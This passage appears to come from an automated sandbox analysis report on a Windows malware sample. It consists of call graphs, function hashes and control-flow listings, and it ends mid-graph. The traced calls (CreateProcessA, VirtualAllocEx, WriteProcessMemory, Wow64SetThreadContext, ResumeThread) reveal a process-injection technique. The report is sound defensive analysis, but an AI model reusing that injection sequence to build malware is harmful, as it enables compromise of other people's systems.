80071->80075 80078 c04daf8 PostMessageW 80071->80078 80076 c04daf9 PostMessageW 80075->80076 80077 c04db64 80076->80077 80077->80071 80079 c04db64 80078->80079 80079->80071 80251 79d5f40 80252 79d5f52 80251->80252 80253 79d606d 80252->80253 80255 c04cc88 2 API calls 80252->80255 80256 c04ef10 80252->80256 80255->80253 80257 c04ef19 80256->80257 80258 c04efde 80257->80258 80259 c04ef71 GetFocus 80257->80259 80258->80253 80260 c04ef99 80259->80260 80260->80258 80261 c04efdc KiUserCallbackDispatcher 80260->80261 80261->80258 80262 c0409da 80263 c0409df 80262->80263 80270 c042bc8 80263->80270 80273 c042bb8 80263->80273 80264 c040ac8 80277 c0441e3 80264->80277 80281 c0441f0 80264->80281 80265 c040c9b 80272 58b45a0 6 API calls 80270->80272 80271 c042bd0 80271->80264 80272->80271 80274 c042bc8 80273->80274 80276 58b45a0 6 API calls 80274->80276 80275 c042bd0 80275->80264 80276->80275 80278 c044236 80277->80278 80279 c044244 GetForegroundWindow 80278->80279 80280 c04426c 80279->80280 80280->80265 80282 c044236 80281->80282 80283 c044244 GetForegroundWindow 80282->80283 80284 c04426c 80283->80284 80284->80265 80080 58b4428 80081 58b4438 80080->80081 80088 58b5a68 80081->80088 80100 58b5a52 80081->80100 80112 58b5d14 80081->80112 80118 c04d660 80081->80118 80122 c04d670 80081->80122 80082 58b4461 80092 58b5a94 80088->80092 80090 58b45a0 6 API calls 80091 58b5e74 80090->80091 80091->80082 80099 58b5ccc 80092->80099 80126 58b56e0 80092->80126 80093 58b5b4d 80094 58b45a0 6 API calls 80093->80094 80098 58b5bf5 80093->80098 80095 58b5bbf 80094->80095 80096 58b45a0 6 API calls 80095->80096 80096->80098 80097 58b45a0 6 API calls 80097->80099 80098->80097 80099->80090 80099->80091 80104 58b5a68 80100->80104 80101 58b56e0 6 API calls 80105 58b5b4d 80101->80105 80102 58b45a0 6 API calls 80103 58b5e74 80102->80103 80103->80082 80104->80101 80111 58b5ccc 80104->80111 80106 58b45a0 6 API calls 80105->80106 80110 58b5bf5 80105->80110 80107 58b5bbf 80106->80107 80108 58b45a0 6 API calls 80107->80108 80108->80110 80109 58b45a0 6 API calls 80109->80111 80110->80109 80111->80102 80111->80103 80113 58b5d1d 80112->80113 80115 58b5d3b 80112->80115 80114 58b45a0 6 API calls 80113->80114 80113->80115 80114->80115 80116 58b45a0 6 API calls 80115->80116 80117 58b5e74 80115->80117 80116->80117 80117->80082 80119 c04d6a5 80118->80119 80121 58b5d14 6 API calls 80119->80121 80120 c04d6fa 80120->80082 80121->80120 80123 c04d6a5 80122->80123 80125 58b5d14 6 API calls 80123->80125 80124 c04d6fa 80124->80082 80125->80124 80128 58b56eb 80126->80128 80127 58b45a0 6 API calls 80130 58b5fc9 80127->80130 80129 58b45a0 6 API calls 80128->80129 80128->80130 80131 58b6007 80128->80131 80129->80130 80130->80127 80130->80131 80131->80093 79413 c04b020 79414 c04b048 79413->79414 79417 c049914 79414->79417 79418 c04991f 79417->79418 79419 c04b60c 79418->79419 79420 c04b709 79418->79420 79421 58b45a0 6 API calls 79418->79421 79419->79420 79424 79d6c80 79419->79424 79433 79d6c70 79419->79433 79421->79419 79426 79d6ce5 79424->79426 79425 79d5bf8 PeekMessageW 79425->79426 79426->79425 79428 79d7148 WaitMessage 79426->79428 79430 79d6d32 79426->79430 79431 79d72f1 PeekMessageW GetActiveWindow 79426->79431 79432 79d7300 PeekMessageW GetActiveWindow 79426->79432 79442 79d5c10 79426->79442 79445 79d5c44 79426->79445 79428->79426 79430->79420 79431->79426 79432->79426 79434 79d6c79 79433->79434 79435 79d5bf8 PeekMessageW 79434->79435 79436 79d5c10 KiUserCallbackDispatcher 79434->79436 79437 79d7148 WaitMessage 79434->79437 79438 79d5c44 DispatchMessageW 79434->79438 79439 79d6d32 79434->79439 79440 79d72f1 PeekMessageW GetActiveWindow 79434->79440 79441 79d7300 PeekMessageW GetActiveWindow 79434->79441 79435->79434 79436->79434 79437->79434 79438->79434 79439->79420 79440->79434 79441->79434 79443 79d75e8 KiUserCallbackDispatcher 79442->79443 79444 79d765c 79443->79444 79444->79426 79446 79d7ac0 DispatchMessageW 79445->79446 79447 79d7b2c 79446->79447 79447->79426 80285 c0430e0 80286 c043122 80285->80286 80287 c043128 SetWindowTextW 80285->80287 80286->80287 80288 c043159 80287->80288 80289 c043be0 80291 c043c07 80289->80291 80290 c043d0c 80291->80290 80292 c043c68 80291->80292 80293 1b0cac4 6 API calls 80291->80293 80297 1b0f578 80291->80297 80292->80290 80296 79d2100 7 API calls 80292->80296 80301 79d2110 80292->80301 80293->80292 80296->80290 80298 1b0f588 80297->80298 80299 1b0dde8 6 API calls 80298->80299 80300 1b0f5af 80299->80300 80300->80292 80302 79d213a 80301->80302 80304 7ce17eb 6 API calls 80302->80304 80303 79d215c 80303->80290 80304->80303 80305 1b0d158 80306 1b0d19e GetCurrentProcess 80305->80306 80308 1b0d1f0 GetCurrentThread 80306->80308 80309 1b0d1e9 80306->80309 80310 1b0d226 80308->80310 80311 1b0d22d GetCurrentProcess 80308->80311 80309->80308 80310->80311 80314 1b0d263 80311->80314 80312 1b0d28b GetCurrentThreadId 80313 1b0d2bc 80312->80313 80314->80312 80315 1b0fc58 80317 1b0aaa8 2 API calls 80315->80317 80318 1b0aa99 2 API calls 80315->80318 80316 1b0fc91 80317->80316 80318->80316 80319 c04a6e8 80320 c04a753 80319->80320 80325 c04aae8 80319->80325 80321 c04a812 GetCapture 80320->80321 80320->80325 80323 c04a854 80321->80323 80322 c04a895 GetActiveWindow 80324 c04a8cc 80322->80324 80323->80322 80324->80325 80328 79d0448 80324->80328 80333 79d0428 80324->80333 80330 79d046e 80328->80330 80329 79d0482 80329->80325 80330->80329 80331 1b0de80 8 API calls 80330->80331 80332 1b0de88 8 API calls 80330->80332 80331->80329 80332->80329 80334 79d042d 80333->80334 80335 79d0482 80334->80335 80336 1b0de80 8 API calls 80334->80336 80337 1b0de88 8 API calls 80334->80337 80335->80325 80336->80335 80337->80335 79448 7ce04e0 79449 7ce0507 79448->79449 79451 7ce0725 79449->79451 79452 58bbdc0 7 API calls 79449->79452 79450 7ce0759 79452->79450 80132 79d1e33 80133 79d1e46 80132->80133 80138 79d2068 80133->80138 80142 79d2100 80133->80142 80150 79d2042 80133->80150 80134 79d1e69 80139 79d20a5 PostMessageW 80138->80139 80141 79d20d4 80139->80141 80141->80134 80143 79d2107 80142->80143 80144 79d20a1 PostMessageW 80142->80144 80143->80144 80147 79d210b 80143->80147 80146 79d20d4 80144->80146 80146->80134 80155 7ce17eb 80147->80155 80148 79d215c 80148->80134 80151 79d2049 80150->80151 80152 79d20b5 PostMessageW 80151->80152 80154 79d1f81 80151->80154 80153 79d20d4 80152->80153 80153->80134 80154->80134 80156 7ce1804 80155->80156 80160 1b0eaff 80156->80160 80164 1b0eb10 80156->80164 80157 7ce1834 80157->80148 80161 1b0eb10 80160->80161 80162 1b0cac4 6 API calls 80161->80162 80163 1b0eb71 80161->80163 80162->80163 80163->80157 80166 1b0eb2d 80164->80166 80165 1b0eb71 80165->80157 80166->80165 80167 1b0cac4 6 API calls 80166->80167 80167->80165 80168 79ddd32 80169 79ddd39 80168->80169 80171 79ddcd5 80169->80171 80174 79ddd72 80169->80174 80179 79ddd80 80169->80179 80170 79ddd5e 80175 79ddd79 80174->80175 80176 79ddd15 80175->80176 80184 7ce6d90 80175->80184 80189 7ce6da0 80175->80189 80176->80170 80180 79dddb1 80179->80180 80181 79ddddd 80180->80181 80182 7ce6d90 DrawTextExW 80180->80182 80183 7ce6da0 DrawTextExW 80180->80183 80181->80170 80182->80181 80183->80181 80185 7ce6dd6 80184->80185 80186 7ce6d9e 80184->80186 80185->80176 80186->80185 80194 7ce4b5c 80186->80194 80188 7ce6e41 80191 7ce6dc1 80189->80191 80190 7ce6dd6 80190->80176 80191->80190 80192 7ce4b5c DrawTextExW 80191->80192 80193 7ce6e41 80192->80193 80196 7ce4b67 80194->80196 80195 7ce8349 80195->80188 80196->80195 80200 7ce8e18 80196->80200 80203 7ce8e08 80196->80203 80197 7ce845c 80197->80188 80207 7ce790c 80200->80207 80204 7ce8e18 80203->80204 80205 7ce790c DrawTextExW 80204->80205 80206 7ce8e35 80205->80206 80206->80197 80208 7ce8e50 DrawTextExW 80207->80208 80210 7ce8e35 80208->80210 80210->80197 80338 c04b8f6 80341 c04b108 80338->80341 80342 c04b113 80341->80342 80345 c04c108 80342->80345 80343 c04b903 80346 c04c111 GetCurrentThreadId 80345->80346 80348 c04c1ad 80346->80348 80348->80343 80211 58b1f38 SetWindowLongW 80212 58b1fa4 80211->80212 79453 ccda5f8 79454 ccda612 79453->79454 79469 ccdb06c 79454->79469 79473 ccdadb2 79454->79473 79477 ccdaeb4 79454->79477 79480 ccdaa70 79454->79480 79485 ccdaef8 79454->79485 79490 ccdacb5 79454->79490 79494 ccdacf9 79454->79494 79498 ccdadd9 79454->79498 79501 ccdac7c 79454->79501 79504 ccdad1f 79454->79504 79508 ccdb208 79454->79508 79512 ccdaf83 79454->79512 79516 ccdb02d 79454->79516 79455 ccda636 79470 ccdb072 79469->79470 79471 ccdb26e 79470->79471 79520 755cb38 79470->79520 79471->79455 79474 ccdad36 79473->79474 79475 ccdad57 79474->79475 79524 755cd80 79474->79524 79475->79455 79478 ccdadd8 79477->79478 79479 755cd80 WriteProcessMemory 79478->79479 79479->79478 79528 755d008 79480->79528 79486 ccdaefe 79485->79486 79532 ccdb6c0 79486->79532 79536 ccdb6bb 79486->79536 79487 ccdb2ef 79491 ccdacb8 79490->79491 79492 ccdacfe 79491->79492 79493 755cd80 WriteProcessMemory 79491->79493 79493->79491 79495 ccdacfe 79494->79495 79496 ccdacb8 79494->79496 79496->79494 79497 755cd80 WriteProcessMemory 79496->79497 79497->79496 79499 ccdade9 79498->79499 79500 755cd80 WriteProcessMemory 79499->79500 79500->79499 79544 755cbe8 79501->79544 79505 ccdad25 79504->79505 79507 755cd80 WriteProcessMemory 79505->79507 79506 ccdad57 79506->79455 79507->79506 79509 ccdb299 79508->79509 79511 755cbe8 Wow64SetThreadContext 79509->79511 79510 ccdb2b4 79511->79510 79513 ccdaf89 79512->79513 79548 755ce70 79513->79548 79517 ccdaf8a 79516->79517 79518 ccdab37 79516->79518 79517->79518 79519 755ce70 ReadProcessMemory 79517->79519 79518->79455 79519->79518 79521 755cb78 ResumeThread 79520->79521 79523 755cba9 79521->79523 79523->79470 79525 755cdc8 WriteProcessMemory 79524->79525 79527 755ce1f 79525->79527 79527->79475 79529 755d091 CreateProcessA 79528->79529 79531 755d253 79529->79531 79533 ccdb6d5 79532->79533 79540 755ccc0 79533->79540 79537 ccdb6d5 79536->79537 79539 755ccc0 VirtualAllocEx 79537->79539 79538 ccdb6f4 79538->79487 79539->79538 79541 755cd00 VirtualAllocEx 79540->79541 79543 755cd3d 79541->79543 79543->79487 79545 755cc2d Wow64SetThreadContext 79544->79545 79547 755cc75 79545->79547 79549 755cebb ReadProcessMemory 79548->79549 79551 755ceff 79549->79551 79551->79455 79708 58b1cf0 79709 58b1d58 CreateWindowExW 79708->79709 79711 58b1e14 79709->79711

                                                                                    Executed Functions

                                                                                    Function 058B76C8 Relevance: 14.5, Strings: 11, Instructions: 725COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 'Tq$($($($)$)$)$)$)$.$$Tq
                                                                                    • API String ID: 0-2574248669
                                                                                    • Opcode ID: 88e623720cbd7eea442e1ff54e0b6ebfa87ff7885ad5f75d1065dc85ad84a638
                                                                                    • Instruction ID: b10a7a0e8175ed5d48373fc2b7091887152bf70562d61fe74b0cbc40f9a86dcb
                                                                                    • Opcode Fuzzy Hash: 88e623720cbd7eea442e1ff54e0b6ebfa87ff7885ad5f75d1065dc85ad84a638
                                                                                    • Instruction Fuzzy Hash: 2E624730A00705CFDB14EF78C894B9977B6EF89300F1486A9D809AF3A5DB75AD85CB91
                                                                                    Function 058B76B8 Relevance: 14.4, Strings: 11, Instructions: 673COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 212 58b76b8-58b7726 221 58b7730-58b7734 call 58b740c 212->221 223 58b7739-58b7768 call 58b741c 221->223 229 58b7772-58b7776 call 58b742c 223->229 231 58b777b-58b781c call 58b743c * 5 229->231 253 58b7826-58b782a call 58b744c 231->253 255 58b782f-58b7847 253->255 258 58b784e-58b7861 255->258 260 58b786b-58b7889 call 58b745c 258->260 262 58b788e-58b78a7 call 58b746c 260->262 265 58b78ac-58b79a6 call 58b747c call 58b748c call 58b749c call 58b74ac call 58b74bc 262->265 278 58b79ab-58b79ca call 58b74cc 265->278 281 58b79cf-58b7a2c call 58b74dc 278->281 289 58b7a37-58b7a3e 281->289 290 58b7a4a-58b7ad1 289->290 298 58b7ad8-58b7af2 290->298 299 58b7af8-58b7afa 298->299 300 58b7b04-58b7b08 299->300 301 58b7b0e-58b7b12 300->301 302 58b814b-58b8161 301->302 303 58b7b18-58b7bdd call 58b74ec 301->303 307 58b80ed-58b80f9 302->307 308 58b8163-58b81d2 302->308 336 58b7be7-58b7c20 call 58b747c 303->336 310 58b8100-58b8110 call 58b577c 307->310 313 58b81da-58b81dc 308->313 318 58b8117-58b811f 310->318 419 58b81e1 call 1b08430 313->419 420 58b81e1 call 1b05c7c 313->420 316 58b81e6-58b8223 call 58b75fc call 58b760c 421 58b8121 call 58bc218 318->421 422 58b8121 call 58bc207 318->422 319 58b8126-58b8135 call 58b75ec 423 58b8137 call 58bc218 319->423 424 58b8137 call 58bc207 319->424 327 58b813c-58b813e call 58b75ec 333 58b8143-58b814a 327->333 339 58b7c25-58b7cd9 call 58b749c call 58b74fc call 58b74ac call 58b750c call 58b74bc 336->339 350 58b7cde-58b7cec 339->350 351 58b7cf1-58b7f0a call 58b751c * 5 call 58b752c call 58b753c call 58b751c 350->351 378 58b7f0f-58b7f4a 351->378 379 58b7f50-58b7f87 call 58b754c 378->379 382 58b7f8c-58b7fe1 call 58b755c call 58b756c 379->382 386 58b7fe6-58b7fe8 call 58b757c 382->386 388 58b7fed-58b7ff7 386->388 415 58b7ffa call 7ce0d2b 388->415 416 58b7ffa call 7ce0d30 388->416 389 58b7ffd-58b7fff call 58b757c 391 58b8004-58b800e 389->391 417 58b8011 call 7ce0d2b 391->417 418 58b8011 call 7ce0d30 391->418 392 58b8014-58b801b call 58b758c 394 58b8020-58b8036 392->394 396 58b8038-58b803e 394->396 397 58b804e-58b80f9 call 58b759c call 58b75ac call 58b75bc call 58b75cc call 58b75dc call 58b749c 394->397 398 58b8042-58b8044 396->398 399 58b8040 396->399 397->310 398->397 399->397 415->389 416->389 417->392 418->392 419->316 420->316 421->319 422->319 423->327 424->327
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 'Tq$($($($)$)$)$)$)$.$$Tq
                                                                                    • API String ID: 0-2574248669
                                                                                    • Opcode ID: daf32301ce7277711467770a400a4f35b72485872edd012a4955326f329fea6b
                                                                                    • Instruction ID: ce36344147a0b3419415d0015c86a9294b329cee8aee2e2aa29cc23159d5a8ce
                                                                                    • Opcode Fuzzy Hash: daf32301ce7277711467770a400a4f35b72485872edd012a4955326f329fea6b
                                                                                    • Instruction Fuzzy Hash: 07524634A00705CFDB14EF78C894A9977B6FF89300F1486A8D809AF3A5DB75AD85CB91
                                                                                    Function 0C04A6E8 Relevance: 3.6, APIs: 2, Instructions: 551COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 691 c04a6e8-c04a74d 692 c04ac35-c04ac9e call c042990 691->692 693 c04a753-c04a760 691->693 696 c04aca5-c04acfc call c042990 692->696 693->696 697 c04a766-c04a770 693->697 702 c04ad03-c04ad5a call c042990 696->702 701 c04a776-c04a780 697->701 697->702 704 c04a786-c04a790 701->704 705 c04ad61-c04adb8 call c042990 701->705 702->705 708 c04a796-c04a79d 704->708 709 c04adbf-c04ae1c call c042990 704->709 705->709 719 c04ae23-c04ae91 call c042b18 708->719 720 c04a7a3-c04a7a7 708->720 709->719 779 c04ae93-c04ae97 719->779 780 c04ae99-c04ae9b 719->780 724 c04a7fe-c04a852 call c049804 call c049814 GetCapture 720->724 725 c04a7a9-c04a7de 720->725 752 c04a854-c04a85a 724->752 753 c04a85b-c04a869 724->753 725->724 748 c04a7e0-c04a7ef 725->748 748->724 768 c04a7f1-c04a7fb call c0497f4 748->768 752->753 754 c04a895-c04a8ca GetActiveWindow 753->754 755 c04a86b-c04a890 call c043554 call c049824 753->755 762 c04a8d3-c04a8e4 754->762 763 c04a8cc-c04a8d2 754->763 755->754 771 c04a8e6-c04a8f1 762->771 772 c04a8f3 762->772 763->762 768->724 778 c04a8f6-c04a928 771->778 772->778 789 c04a93d-c04a960 778->789 790 c04a92a-c04a930 778->790 784 c04aea0-c04aeae 779->784 780->784 795 c04a966-c04a970 789->795 796 c04aa28-c04aa32 789->796 790->789 791 c04a932-c04a938 call c049830 790->791 791->789 795->796 801 c04a976-c04a9a9 795->801 797 c04aa34-c04aa37 call c04aeff 796->797 798 c04aa3d-c04aa60 796->798 797->798 804 c04aa62-c04aa65 798->804 805 c04aa68-c04aa76 798->805 808 c04a9af-c04aa1e 801->808 809 c04ab7b-c04ac0b call c042990 call c049830 801->809 804->805 810 c04aaac-c04aaba 805->810 811 c04aa78-c04aa86 805->811 808->796 809->692 816 c04aabc-c04aaca 810->816 817 c04aad8-c04aadf 810->817 811->810 818 c04aa88-c04aaaa call c049840 811->818 816->817 825 c04aacc-c04aad2 816->825 859 c04aae5 call 79d0428 817->859 860 c04aae5 call 79d0448 817->860 818->817 824 c04aae8-c04aaf8 830 c04ab4d-c04ab5d 824->830 831 c04aafa-c04ab04 824->831 825->817 829 c04aad3 call c049840 825->829 829->817 830->809 836 c04ab06-c04ab19 call c04984c 831->836 837 c04ab42-c04ab47 831->837 836->837 846 c04ab1b-c04ab3b 836->846 855 c04ab4a call ccd76bc 837->855 856 c04ab4a call ccd7437 837->856 857 c04ab4a call ccd7440 837->857 846->837 855->830 856->830 857->830 859->824 860->824
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveCaptureWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2424615356-0
                                                                                    • Opcode ID: 3df1adb7ed4b542b722bd63a75713ff92911f56a6267a86b10970629f0605c09
                                                                                    • Instruction ID: 5ac35677792bf450114b2ad00b039178bafc4f87314fd72a138d5ab94493d9e8
                                                                                    • Opcode Fuzzy Hash: 3df1adb7ed4b542b722bd63a75713ff92911f56a6267a86b10970629f0605c09
                                                                                    • Instruction Fuzzy Hash: 312278B0B002098FDB65EBB9C9547AEB7F6AFC8300F248179D409AB395DB349D46CB51
                                                                                    Function 0C04A6C1 Relevance: 3.3, APIs: 2, Instructions: 323COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 861 c04a6c1-c04a74d 863 c04ac35-c04ac9e call c042990 861->863 864 c04a753-c04a760 861->864 867 c04aca5-c04acfc call c042990 863->867 864->867 868 c04a766-c04a770 864->868 873 c04ad03-c04ad5a call c042990 867->873 872 c04a776-c04a780 868->872 868->873 875 c04a786-c04a790 872->875 876 c04ad61-c04adb8 call c042990 872->876 873->876 879 c04a796-c04a79d 875->879 880 c04adbf-c04ae1c call c042990 875->880 876->880 890 c04ae23-c04ae91 call c042b18 879->890 891 c04a7a3-c04a7a7 879->891 880->890 950 c04ae93-c04ae97 890->950 951 c04ae99-c04ae9b 890->951 895 c04a7fe-c04a852 call c049804 call c049814 GetCapture 891->895 896 c04a7a9-c04a7de 891->896 923 c04a854-c04a85a 895->923 924 c04a85b-c04a869 895->924 896->895 919 c04a7e0-c04a7ef 896->919 919->895 939 c04a7f1-c04a7fb call c0497f4 919->939 923->924 925 c04a895-c04a8ca GetActiveWindow 924->925 926 c04a86b-c04a890 call c043554 call c049824 924->926 933 c04a8d3-c04a8e4 925->933 934 c04a8cc-c04a8d2 925->934 926->925 942 c04a8e6-c04a8f1 933->942 943 c04a8f3 933->943 934->933 939->895 949 c04a8f6-c04a928 942->949 943->949 960 c04a93d-c04a960 949->960 961 c04a92a-c04a930 949->961 955 c04aea0-c04aeae 950->955 951->955 966 c04a966-c04a970 960->966 967 c04aa28-c04aa32 960->967 961->960 962 c04a932-c04a938 call c049830 961->962 962->960 966->967 972 c04a976-c04a9a9 966->972 968 c04aa34-c04aa37 call c04aeff 967->968 969 c04aa3d-c04aa60 967->969 968->969 975 c04aa62-c04aa65 969->975 976 c04aa68-c04aa76 969->976 979 c04a9af-c04aa1e 972->979 980 c04ab7b-c04ac0b call c042990 call c049830 972->980 975->976 981 c04aaac-c04aaba 976->981 982 c04aa78-c04aa86 976->982 979->967 980->863 987 c04aabc-c04aaca 981->987 988 c04aad8-c04aadf 981->988 982->981 989 c04aa88-c04aaaa call c049840 982->989 987->988 996 c04aacc-c04aad2 987->996 1030 c04aae5 call 79d0428 988->1030 1031 c04aae5 call 79d0448 988->1031 989->988 995 c04aae8-c04aaf8 1001 c04ab4d-c04ab5d 995->1001 1002 c04aafa-c04ab04 995->1002 996->988 1000 c04aad3 call c049840 996->1000 1000->988 1001->980 1007 c04ab06-c04ab19 call c04984c 1002->1007 1008 c04ab42-c04ab47 1002->1008 1007->1008 1017 c04ab1b-c04ab3b 1007->1017 1026 c04ab4a call ccd76bc 1008->1026 1027 c04ab4a call ccd7437 1008->1027 1028 c04ab4a call ccd7440 1008->1028 1017->1008 1026->1001 1027->1001 1028->1001 1030->995 1031->995
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveCaptureWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2424615356-0
                                                                                    • Opcode ID: 198173c3746576d379d855e4073d85e1ad0c503517b5589202abf3add49feffe
                                                                                    • Instruction ID: 99fccb64d740575970cd91e4e2212ef8afcae6333171b7f1abaa44bee3027d0a
                                                                                    • Opcode Fuzzy Hash: 198173c3746576d379d855e4073d85e1ad0c503517b5589202abf3add49feffe
                                                                                    • Instruction Fuzzy Hash: B5E1EB75E00209CFDB25DFB5C584ADEBBF6BF89300F244269E405AB2A1DB719985DF10
                                                                                    Function 079D6C80 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1083 79d6c80-79d6ce3 1084 79d6ce5-79d6d0f 1083->1084 1085 79d6d12-79d6d30 1083->1085 1084->1085 1090 79d6d39-79d6d70 1085->1090 1091 79d6d32-79d6d34 1085->1091 1095 79d6d76-79d6d8a 1090->1095 1096 79d71a1 1090->1096 1092 79d71f2-79d7207 1091->1092 1097 79d6d8c-79d6db6 1095->1097 1098 79d6db9-79d6dd8 1095->1098 1099 79d71a6-79d71bc 1096->1099 1097->1098 1105 79d6dda-79d6de0 1098->1105 1106 79d6df0-79d6df2 1098->1106 1099->1092 1107 79d6de4-79d6de6 1105->1107 1108 79d6de2 1105->1108 1109 79d6df4-79d6e0c 1106->1109 1110 79d6e11-79d6e1a 1106->1110 1107->1106 1108->1106 1109->1099 1112 79d6e22-79d6e29 1110->1112 1113 79d6e2b-79d6e31 1112->1113 1114 79d6e33-79d6e3a 1112->1114 1115 79d6e47-79d6e64 call 79d5bf8 1113->1115 1116 79d6e3c-79d6e42 1114->1116 1117 79d6e44 1114->1117 1120 79d6fb9-79d6fbd 1115->1120 1121 79d6e6a-79d6e71 1115->1121 1116->1115 1117->1115 1123 79d718c-79d719f 1120->1123 1124 79d6fc3-79d6fc7 1120->1124 1121->1096 1122 79d6e77-79d6ea6 1121->1122 1195 79d6ea9 call 79d72f1 1122->1195 1196 79d6ea9 call 79d7300 1122->1196 1123->1099 1125 79d6fc9-79d6fdc 1124->1125 1126 79d6fe1-79d6fea 1124->1126 1125->1099 1128 79d6fec-79d7016 1126->1128 1129 79d7019-79d7020 1126->1129 1127 79d6eaf-79d6eb4 1132 79d6eba-79d6ebf 1127->1132 1133 79d7182-79d7186 1127->1133 1128->1129 1130 79d70bf-79d70c6 1129->1130 1131 79d7026-79d702d 1129->1131 1197 79d70c9 call 79d72f1 1130->1197 1198 79d70c9 call 79d7300 1130->1198 1134 79d705c-79d707e 1131->1134 1135 79d702f-79d7059 1131->1135 1136 79d6ef1-79d6f06 call 79d5c1c 1132->1136 1137 79d6ec1-79d6ecf call 79d5c04 1132->1137 1133->1112 1133->1123 1134->1130 1171 79d7080-79d708a 1134->1171 1135->1134 1142 79d6f0b-79d6f0f 1136->1142 1137->1136 1152 79d6ed1-79d6eea call 79d5c10 1137->1152 1139 79d70cf-79d70d4 1139->1133 1144 79d70da-79d70dc 1139->1144 1148 79d6f11-79d6f23 call 79d5c28 1142->1148 1149 79d6f80-79d6f8d 1142->1149 1150 79d70de-79d7117 1144->1150 1151 79d7129-79d713f call 79d5bf8 1144->1151 1176 79d6f25-79d6f55 1148->1176 1177 79d6f63-79d6f7b 1148->1177 1149->1133 1163 79d6f93-79d6f9d call 79d5c38 1149->1163 1166 79d7119-79d711f 1150->1166 1167 79d7120-79d7127 1150->1167 1160 79d7144-79d7146 1151->1160 1161 79d6eef 1152->1161 1160->1133 1169 79d7148-79d7174 WaitMessage 1160->1169 1161->1142 1179 79d6fac-79d6fb4 call 79d5c50 1163->1179 1180 79d6f9f-79d6fa2 call 79d5c44 1163->1180 1166->1167 1167->1133 1173 79d717b 1169->1173 1174 79d7176 1169->1174 1184 79d708c-79d7092 1171->1184 1185 79d70a2-79d70bd 1171->1185 1173->1133 1174->1173 1191 79d6f5c 1176->1191 1192 79d6f57 1176->1192 1177->1099 1179->1133 1187 79d6fa7 1180->1187 1189 79d7094 1184->1189 1190 79d7096-79d7098 1184->1190 1185->1130 1185->1171 1187->1133 1189->1185 1190->1185 1191->1177 1192->1191 1195->1127 1196->1127 1197->1139 1198->1139
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: fe824b5dd9efbc33f3f58cbd441431ad89ff1ac2223656ad43e33f61a4992fc7
                                                                                    • Instruction ID: eb21199b72ecda74027496e4227d6768708e89ffa4608370886af329cb952e61
                                                                                    • Opcode Fuzzy Hash: fe824b5dd9efbc33f3f58cbd441431ad89ff1ac2223656ad43e33f61a4992fc7
                                                                                    • Instruction Fuzzy Hash: 50F169B0A00209DFDB24DFA9C844B9DBBF1BF88318F15C569E405AB2A5DB70AD45CB90
                                                                                    Function 0C043710 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1407 c043710-c0458cc 1411 c045aa4-c045aae 1407->1411 1412 c0458d2-c0458dc 1407->1412 1413 c045ac0-c045b26 call c0437c4 1411->1413 1414 c045ab0-c045aba 1411->1414 1412->1411 1415 c0458e2-c045a44 call c043794 call c043e20 call c043794 call c044180 call c043794 call c043e20 call c043794 call c044180 call c0437a4 call c043794 call c043e20 call c043794 call c043e20 call c043794 call c044180 1412->1415 1448 c045d61-c045d91 1413->1448 1449 c045b2c-c045b73 call c0437d0 1413->1449 1414->1413 1416 c045e10-c045e17 1414->1416 1523 c045a46-c045a77 1415->1523 1524 c045a79-c045aa1 call c0437b4 1415->1524 1420 c045e1d-c045f0d call c043794 call c043e20 call c044180 call c043e20 call c044180 call c0437f8 1416->1420 1421 c04602b-c046038 1416->1421 1494 c045f0f 1420->1494 1495 c045f1b 1420->1495 1459 c045dc6-c045dd8 1448->1459 1460 c045d93-c045dc1 call c0437ec 1448->1460 1449->1448 1481 c045b79-c045c2b call c0437a4 1449->1481 1472 c045e0d 1459->1472 1473 c045dda-c045e08 call c0437ec 1459->1473 1460->1459 1472->1416 1473->1472 1512 c045cf1-c045d12 1481->1512 1513 c045c31-c045cec call c0437a4 call c0437dc 1481->1513 1494->1495 1495->1421 1521 c045d14-c045d1b 1512->1521 1522 